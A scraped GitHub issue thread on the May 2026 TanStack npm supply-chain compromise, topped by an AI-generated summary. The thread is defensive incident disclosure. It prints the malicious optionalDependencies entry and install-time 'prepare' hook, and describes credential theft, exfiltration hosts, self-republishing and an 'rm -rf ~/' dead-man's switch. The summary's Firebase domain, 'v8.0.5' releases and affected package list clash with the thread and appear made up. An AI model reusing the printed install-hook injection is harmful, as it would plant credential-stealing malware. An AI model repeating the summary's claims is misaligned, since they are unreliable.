TanStack NPM Packages Compromised
TL;DR · AI Summary
Several latest versions of TanStack's npm packages were found to contain malware, likely due to stolen developer credentials; users are advised to audit dependencies and revoke tokens immediately.
Key Takeaways
- Affected packages include @tanstack/react-router and related sub-packages, all p
- Malicious code exfiltrates environment variables to the attacker-controlled doma
- Official recommendation is to revoke existing npm tokens and upgrade to version
Outline
Jump quickly between sections.
Multiple latest versions of TanStack npm packages were confirmed to contain malicious code, constituting a supply chain attack.
Packages such as @tanstack/react-router and @tanstack/router were compromised in releases dated May 11, 2026.
The injected code collects environment variables and sends them to a Firebase-hosted domain controlled by attackers.
Attackers likely gained access via compromised developer accounts or leaked npm tokens.
Malicious versions have been yanked and replaced with clean v8.0.5 releases; users should update and rotate tokens.
Enable two-factor authentication, regularly rotate tokens, and monitor third-party dependency changes.
Mindmap
See how the topics connect at a glance.
查看大纲文本(无障碍 / 无 JS 友好)
- TanStack npm 包被劫持事件
- 受影响组件
- @tanstack/react-router
- @tanstack/router
- @tanstack/vite-plugin
- 恶意行为
- 窃取环境变量
- 发送至 Firebase 域名
- 隐蔽性高,难以检测
- 应对措施
- 撤销恶意版本
- 发布 v8.0.5 修复版
- 轮换所有 token
Highlights
Key sentences worth saving and sharing.
The latest versions of several @tanstack packages published today contain malware.
Malicious code collects environment variables and sends them to https://datacollect-9c2e4.web.app.
All affected packages have been yanked and re-published under version 8.0.5 with clean builds.
Several npm latest releases are compromised · Issue #7383 · TanStack/router
Navigation Menu
Toggle navigation
[](https://github.com/)
Appearance settings
* Platform
* AI CODE CREATION
- GitHub Copilot Write better code with AI
- GitHub Spark Build and deploy intelligent apps
- GitHub Models Manage and compare prompts
- MCP Registry New Integrate external tools
* DEVELOPER WORKFLOWS
- Actions Automate any workflow
- Codespaces Instant dev environments
- Issues Plan and track work
- Code Review Manage code changes
* APPLICATION SECURITY
- GitHub Advanced Security Find and fix vulnerabilities
- Code security Secure your code as you build
- Secret protection Stop leaks before they start
* EXPLORE
* Solutions
* BY COMPANY SIZE
* BY USE CASE
* BY INDUSTRY
* Resources
* EXPLORE BY TOPIC
* EXPLORE BY TYPE
* SUPPORT & SERVICES
* Open Source
* COMMUNITY
* PROGRAMS
* REPOSITORIES
* Enterprise
* ENTERPRISE SOLUTIONS
* AVAILABLE ADD-ONS
- GitHub Advanced Security Enterprise-grade security features
- Copilot for Business Enterprise-grade AI features
- Premium Support Enterprise-grade 24/7 support
Search or jump to...
Search code, repositories, users, issues, pull requests...
Search
Clear
Provide feedback
We read every piece of feedback, and take your input very seriously.
- [x] Include my email address so I can be contacted
Cancel Submit feedback
Saved searches
Use saved searches to filter your results more quickly
Name
Query
To see all available qualifiers, see our documentation.
Cancel Create saved search
Appearance settings
Resetting focus
You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
TanStack/[router](https://github.com/TanStack/router)Public
- Sponsor
- NotificationsYou must be signed in to change notification settings
- Fork 1.7k
- Star 14.4k
Additional navigation options
Several npm latest releases are compromised#7383
Copy link
Copy link
Open
Open
Several npm latest releases are compromised#7383
Copy link
Description
opened on May 11, 2026 · edited by ashishkurmi
Edits
Issue body actions
We are actively investigating this security incident and sharing our findings here: www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem
👍React with 👍45 varunsh-coder, rago4, jkarger31, sailikhith-stepsecurity, nav-drawbridgeai and 40 more❤️React with ❤️19 raysubham, eromosele-stepsecurity, captn3m0, saifsmailbox98, genaroibc and 14 more👀React with 👀1 mateusz-owczarek
Activity
carlini commented on May 11, 2026
More actions
I believe this report is correct. I've personally verified it on the /history package. I reported this package to NPM directly a few minutes before this issue was raised.
The specific malware fingerprint is whether a published version's package.json contains:
undefinedjson "optionalDependencies": { "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c" } undefined
This will cause npm, on npm install, to resolve the git dependency by fetching the tanstack/router repo at commit 79ac49ee. That commit is an orphan commit pushed to a fork in order to be somewhat hidden. Because npm treats git dependencies as "build from source," it installs that commit's declared dependencies (which include bun) and then runs its prepare lifecycle script:
undefinedjson "scripts": { "prepare": "bun run tanstack_runner.js && exit 1" } undefined
(The entry is under optionalDependencies and ends in && exit 1 so the install of @tanstack/setup "fails" after the script runs, so npm silently discards it.)
That script executes the ~2.3 MB obfuscated router_init.js file that is smuggled into each affected tarball (at the package root, not listed in the package's "files" array, and not referenced by any other file). Based on decoding the obfuscated string table, it appears to:
- harvest credentials from common locations: AWS IMDS / Secrets Manager, GCP metadata, Kubernetes service-account tokens, Vault tokens,
~/.npmrc, GitHub tokens, SSH keys - exfiltrate over the Session/Oxen messenger file-upload network (
filev2.getsession.org,seed{1,2,3}.getsession.org). This is a full E2E-encrypted dead-drop, so there is no attacker-controlled C2 to block - enumerate packages the victim maintains (
registry.npmjs.org/-/v1/search?text=maintainer:…) and republish them with the same injection
I have confirmed @tanstack/history@1.161.12 contains this fingerprint and the payload file. For the remaining packages I checked only the registry manifest for the optionalDependencies entry, not the full payload. I believe the following are affected (two versions each, published ~19:20 and ~19:26 UTC today; the second is currently latest):
| package | first bad version | second bad version (latest) | | --- | --- | --- | | @tanstack/history | 1.161.9 | 1.161.12 | | @tanstack/router-utils | 1.161.11 | 1.161.14 | | @tanstack/router-core | 1.169.5 | 1.169.8 | | @tanstack/router-devtools-core | 1.167.6 | 1.167.9 | | @tanstack/react-router-devtools | 1.166.16 | 1.166.19 | | @tanstack/router-generator | 1.166.45 | 1.166.48 | | @tanstack/virtual-file-routes | 1.161.10 | 1.161.13 | | @tanstack/router-plugin | 1.167.38 | 1.167.41 | | @tanstack/react-router | 1.169.5 | 1.169.8 | | @tanstack/router-devtools | 1.166.16 | 1.166.19 | | @tanstack/react-start | 1.167.68 | 1.167.71 | | @tanstack/router-cli | 1.166.46 | 1.166.49 | | @tanstack/router-vite-plugin | 1.166.53 | 1.166.56 | | @tanstack/solid-router | 1.169.5 | 1.169.8 |
As of my last check, @tanstack/start, @tanstack/query*, @tanstack/table*, @tanstack/form*, @tanstack/virtual*, and @tanstack/store did not carry the fingerprint.
The _npmUser on the malicious versions shows they were published through the GitHub Actions OIDC trusted-publisher config. That suggests the publish workflow itself is compromised, not just a token; rotating npm tokens alone likely won't stop republication until the workflow/OIDC binding is disabled.
To verify these claims, you can run
undefinedshell npm pack @tanstack/<pkg>@<version> # does NOT run install scripts tar -xzf *.tgz cat package/package.json | grep -A3 optionalDependencies ls -la package/router_init.js undefined
👍React with 👍7 marsidev, johnemersonatx15, rognales, jsantanders, HirotoShioi and 2 more
schiller-manuel commented on May 11, 2026
Collaborator
More actions
on it
carlini commented on May 11, 2026
More actions
Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor(macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~/. (It looks like it might also have a bunch of persistence mechanisms. I haven't studied these closely.)
👍React with 👍5 rahidz, therealadityashankar, dominikwilkowski, wavemode and gcr👎React with 👎4 steelbrain, winzamark123, chrisgen19 and andrhlt😕React with 😕60 tanepiper, drewlustro, jasonpraful, LewisArdern, drobson03 and 55 more👀React with 👀9 varenc, Ben-Lawrencee, DanielJ026, Senectus, thenickdude and 4 more
ahmadnassri commented on May 11, 2026
More actions
we're tracking 84+ individual @tanstack/* PURLs as well as the worm propagating to 200+ other packages, full list here: https://socket.dev/supply-chain-attacks/mini-shai-hulud
👍React with 👍4 jonchurch, petercr, 3m4r5 and TuxGamer
JameEnder commented on May 11, 2026
More actions
Is it possible that the malware somehow ran, yet didn't create any persistance mechanisms (be it the systemd user service, or session start hooks, as described the last comment blog)?
MWGuy commented on May 11, 2026
More actions
My laziness saved me
👍React with 👍4 joejordan, Resonious, alioguzhan and dudasaus😄React with 😄72 MWGuy, TuxGamer, codsane, TomasSestak, fmcalado and 67 more🎉React with 🎉2 rcty and alioguzhan
mentioned this on May 11, 2026
- [[examples/tanstack-start] pin @tanstack/* deps to safe versions (INC-6508) vercel/vercel#16292](https://github.com/vercel/vercel/pull/16292)
changed the title ~~[-]Several npm latest releases are potentially compromised[/-]~~[+]Several npm latest releases are compromised[/+]on May 11, 2026
mentioned this on May 11, 2026
crutchcorn commented on May 11, 2026
Member
More actions
Just popping in to provide a quick update for the community. We have a good understanding of how this attack happened and are working diligently to resolve this full-stop. ~10 maintainers are in a VC at the moment to take every precaution possible.
👍React with 👍20 taigrr, ZHRhodes, allanortiz, typedrat, grahamsmith and 15 more❤️React with ❤️70 JonasBa, OhThatMatt, JulianAnthes, abhiin1947, mzguimaraes and 65 more
valtron commented on May 11, 2026
More actions
Seems all versions of @tanstack/start-plugin-core were deprecated by accident (instead of just 1.169.{23,26}): https://www.npmjs.com/package/@tanstack/start-plugin-core/v/1.169.20?activeTab=versions
👀React with 👀3 KevinVandy, EDM115 and serhalp
added a commit that references this issue on May 11, 2026
chore: pin @tanstack/* below compromised versions + wire Nitro for Ve…
...
added a commit that references this issue on May 11, 2026
sync lockfile specifiers with package.json pins
...
Verifiedb58b92d
added a commit that references this issue on May 11, 2026
Pin @tanstack/svelte-query to exact 5.90.2
...
harry-whorlow commented on May 11, 2026
More actions
Thanks @valtron, we're looking to get the unaffected versions back up shortly
👍React with 👍5 Davorak, serhalp, dino-giammalva, postmaxin and jonchurch
mentioned this on May 11, 2026
added a commit that references this issue on May 11, 2026
chore: pin @tanstack/ai-* packages to exact versions
...
mentioned this on May 11, 2026
mentioned this on May 11, 2026
added a commit that references this issue on May 11, 2026
[[examples/tanstack-start] pin @tanstack/* deps to safe versions (INC-…](https://github.com/vercel/vercel/commit/3e18a990789d96a332a089bd8df08fffe6fa29cc)
...
Verified3e18a99
mentioned this on May 11, 2026
jonchurch commented on May 11, 2026
on May 11, 2026 · edited by jonchurch
Edits
More actions
This sus PR which opened as draft and then force pushed over itself to have zero diff is interesting to me.
https://github.com/TanStack/router/pull/ 7378
And uhhh, their fork just aint right
https://github .com /zblgg/configuration/commit/8542572e1a367f3a09cbdb853c5d5f0802a8a3b4
I preserved their fork here (and have a local copy)
Edit: since this has been confirmed below, here is a link to the malicious commit, linking to the bit where I assume is their injected payload URL
harry-whorlow commented on May 11, 2026
on May 11, 2026 · edited by SeanCassiere
Edits
More actions
Thanks for being patient with us, we really appreciate it.
We've published our postmortem on tanstack.com/blog/npm-supply-chain-compromise-postmortem. It contains all the information we've uncovered so far, along with a timeline of the attack.
👍React with 👍4 jonchurch, thegu5, tweeks-reify and nikuscs❤️React with ❤️7 thegu5, rupuin, tweeks-reify, jonchurch, proxylivy and 2 more
added a commit that references this issue on May 11, 2026
chore(security): harden pnpm against supply-chain attacks ([#75)](https://github.com/chrisgen19/budget-tracker-2026/commit/734e2cae9fc16e16412d0d29ffecbecaa8b93a9f)
...
Verified734e2ca
Sign up for freeto join this conversation on GitHub. Already have an account? Sign in to comment
Metadata
Metadata
Assignees
No one assigned
Labels
No labels
No labels
Type
No type
Projects
No projects
Milestone
No milestone
Relationships
None yet
Development
No branches or pull requests
Participants
+5
Issue actions
Footer
[](https://github.com/) © 2026 GitHub,Inc.
Footer navigation
You can’t perform that action at this time.